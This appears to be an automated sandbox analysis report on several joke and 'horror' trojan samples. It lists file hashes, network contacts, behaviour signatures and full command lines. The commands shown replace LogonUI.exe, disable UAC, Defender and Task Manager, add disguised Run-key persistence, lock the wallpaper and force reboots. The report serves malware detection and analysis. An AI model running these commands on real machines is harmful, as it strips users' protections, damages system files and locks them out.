C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65&copy "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit

C:\Windows\SysWOW64\takeown.exe

takeown /f LogonUI.exe

C:\Windows\SysWOW64\icacls.exe

icacls LogonUI.exe /granted "Admin":F

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "tobi0a0c.exe"

Network

Country Destination Domain Proto
US 150.171.27.10:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp
GB 95.101.143.34:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs

MD5 a0679dce64fcf875f4208b823d4b85c0
SHA1 85abe3673db82bfe5b2c207dc98648e32afffea0
SHA256 85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1
SHA512 1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

C:\Users\Admin\Desktop\YOUDIED 5.txt

MD5 05d30a59150a996af1258cdc6f388684
SHA1 c773b24888976c889284365dd0b584f003141f38
SHA256 c5e98b515636d1d7b2cd13326b70968b322469dbbe8c76fc7a84e236c1b579c9
SHA512 2144cd74536bc663d6031d7c718db64fd246346750304a8ceef5b58cd135d6ea061c43c9150334ee292c7367ff4991b118080152b8ebc9c5630b6c5186872a3a

C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe

MD5 74be3afd732dc010c8266326cc32127b
SHA1 a91802c200f10c09ff9a0679c274bbe55ecb7b41
SHA256 03fe34795ad0f91fc8eb8c9ebe8094541e4fb4d7095095f8b48f345c2a6d0f0c
SHA512 68fa03d640680e37614feccb56f4d41180724cb7c08ba25f9bea3830a44c03d635664d8e0255ab2d05d3613498f4a4dd4398b7971a2cb1c9ae3be93f944946e5

C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd

MD5 288bebe9f904e6fabe4de67bd7897445
SHA1 0587ce2d936600a9eb142c6197fe12a0c3e8472f
SHA256 cf965fcc5a7ca4d9245c706c88b4d5013fb84be27b0ec262facccfadf14bdca2
SHA512 7db8e7c1318bcab7cef2c02484a82f347a630443a644b546a5cc339a5a848d1a3e915255f9c357de6ee26817a55d1091d80e2a8e97f66afa5686b3d11ee56c3c

memory/2508-221-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\783D.tmp\bg.bmp

MD5 a605dbeda4f89c1569dd46221c5e85b5
SHA1 5f28ce1e1788a083552b9ac760e57d278467a1f9
SHA256 77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e
SHA512 e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610

C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe

MD5 c47c6a5111193af2c9337634b773d2d3
SHA1 036604921b67bbad60c7823482e5e6cb268ded14
SHA256 7c4f20624dd062a6c71d845d05c6328d5a903ca96398e2902506591b231ed585
SHA512 56698b7b2edc0f94d0f7172c853cbe67ac682d132df768659ebca0c169091acb36ffd0a6874c26e2fb35117061c91c9eca4312532ba778312e3d63cc77ce1262

C:\Users\Admin\AppData\Local\Temp\783D.tmp\mainbgtheme.wav

MD5 1b185a156cfc1ddeff939bf62672516b
SHA1 fd8b803400036f42c8d20ae491e2f1f040a1aed5
SHA256 e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36
SHA512 41b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7

C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe

MD5 4151b988c9d5c550ccb6c3b49bf551d4
SHA1 10ff979be4a5bbacaf208bdbb8236b940208eed1
SHA256 5ec45cc1a109f556d0cd44ba48d3bf11af556ee66dd8b78c94d3ef0e93735e8e
SHA512 c73947b534741c29340550066cd1a6b7cbb4387f3be8303f2d1d0cb21c6f430e0415c27daabc82d32570f421934db78dc840403de18aef09d5a4f0cbe4350e4d

C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe

MD5 219cd85d93a4ed65a481f353a3de5376
SHA1 a38ab77caf5417765d5595b2fcd859c6354bf079
SHA256 00c9fdc8b877c7fb8365709155ab28cb3dac282ae7ec9fc9d47a78b408e0d13f
SHA512 367644e3bc3310207b5863b09688269c38a55540b8c87e71d66771c954d37d561ed09f3ee11b36c4c8f4a48b618b2e8debae3d93ff684d15305f93a3ade6b3d9

memory/5968-240-0x00000000009F0000-0x0000000000EF2000-memory.dmp

memory/5968-241-0x0000000005E90000-0x0000000006436000-memory.dmp

memory/5968-242-0x00000000059C0000-0x0000000005A52000-memory.dmp

memory/5968-243-0x0000000005E50000-0x0000000005E5A000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 b7443e89f0cb29d51ee6a257750e54d2
SHA1 84127eebf275e781d5276af6fc4d09c5a6bfb7b9
SHA256 8226877d6ab2e4834aea6bc71bd9865b28d0bd1ec2e8b4c23b8acf0301c56f26
SHA512 446cfe25d82f3bbf7badd324cae691ad62e13bd7469e415f47b9141bddf30679219c672937f4f6768796c2936c3b9c557fabbda1fb51c5edbb7c1964bffa17be

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:19

Platform

win11-20241007-en

Max time kernel

300s

Max time network

230s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe"

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:14

Platform

win11-20241007-en

Max time kernel

11s

Max time network

14s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\425634766\3423304070.pri C:\Windows\system32\LogonUI.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\shutdown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1516 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 1516 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"

C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe

"covid20.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe

"HorrorBob2.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe

"HorrorRansom 1.0 Final.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe

"HorrorTrojan Ultimate Edition.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe

"HorrorTrojan123.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe

clwcp c:\covid20\bg.bmp

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe

flasher 5 c:\covid20\covid.bmp

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\DllHost.exe

